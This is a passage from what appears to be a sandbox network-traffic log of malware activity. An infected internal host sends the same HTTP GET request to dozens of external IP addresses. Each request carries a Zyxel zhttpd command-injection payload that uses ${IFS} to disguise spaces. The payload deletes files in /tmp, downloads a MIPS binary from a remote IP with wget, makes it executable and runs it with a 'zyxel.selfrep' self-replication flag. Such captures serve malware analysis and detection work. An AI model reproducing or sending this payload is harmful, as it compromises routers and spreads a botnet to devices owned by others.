                                        Jan 14, 2024 16:18:34.208976030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1534192.168.2.133916034.215.140.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209024906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1535192.168.2.133333883.80.99.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209072113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1536192.168.2.133766299.167.29.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209124088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1537192.168.2.1360808187.168.73.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209186077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1538192.168.2.1343548193.231.187.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209248066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1539192.168.2.1341228212.67.22.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209300995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1540192.168.2.133538275.234.11.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209372997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1541192.168.2.1338374121.172.13.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209439993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1542192.168.2.1356872220.134.64.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209491014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1543192.168.2.1359494179.7.208.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209534883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1544192.168.2.1339570183.185.11.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209578037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1545192.168.2.133368469.211.117.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209633112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1546192.168.2.1352108219.240.179.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209686995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1547192.168.2.1343160125.179.253.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209722042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1548192.168.2.1335324202.66.171.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209778070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1549192.168.2.1347344146.246.26.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209814072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1550192.168.2.1347424148.122.8.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209866047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1551192.168.2.1339500137.85.127.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209919930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1552192.168.2.1342750172.136.151.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.209963083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1553192.168.2.1351692118.216.125.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210035086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1554192.168.2.134946474.65.244.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210081100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1555192.168.2.1349364205.236.66.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210139036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1556192.168.2.1340112200.90.128.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210203886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1557192.168.2.133437019.81.23.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210238934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1558192.168.2.1352704152.162.125.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210279942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1559192.168.2.136091420.153.0.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210320950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1560192.168.2.1337072158.7.139.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210344076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1561192.168.2.134903623.213.242.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210410118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1562192.168.2.134729859.237.83.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210442066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1563192.168.2.1340380151.228.82.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210515022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1564192.168.2.1353452119.131.11.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210551023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1565192.168.2.1333640160.235.167.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210607052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1566192.168.2.1350892207.1.172.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210685968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1567192.168.2.1353674162.67.48.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210752964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1568192.168.2.1354560203.55.255.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210798979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1569192.168.2.134549299.144.86.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210860968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1570192.168.2.1343062108.235.83.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210925102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1571192.168.2.1335416166.140.226.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.210974932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1572192.168.2.1333722197.219.232.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211020947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1573192.168.2.135202875.33.67.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211064100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1574192.168.2.134848414.72.179.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211118937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1575192.168.2.134117420.25.226.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211184978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1576192.168.2.134107489.38.96.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211239100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1577192.168.2.134348284.130.37.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211314917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1578192.168.2.136000838.220.131.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211370945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1579192.168.2.1345414132.16.47.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211452961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1580192.168.2.1343350173.93.109.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211503983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1581192.168.2.1346676125.205.251.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211538076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1582192.168.2.1334476178.83.45.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211595058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1583192.168.2.134933477.91.51.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211637974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1584192.168.2.1345054205.153.193.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211704969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1585192.168.2.1344430105.85.41.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211745977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1586192.168.2.134411695.132.7.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211785078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1587192.168.2.134291482.108.95.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211849928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1588192.168.2.1353946193.62.239.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211915970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1589192.168.2.1337602210.130.50.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.211968899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1590192.168.2.135111064.128.70.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212023020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1591192.168.2.134784479.239.24.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212093115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1592192.168.2.1355154117.95.213.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212141991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1593192.168.2.1342844118.48.177.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212188005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1594192.168.2.1351772201.213.103.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212263107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1595192.168.2.1346176164.94.69.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212308884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1596192.168.2.1355912157.160.147.158443
                                        TimestampBytes transferredDirectionData
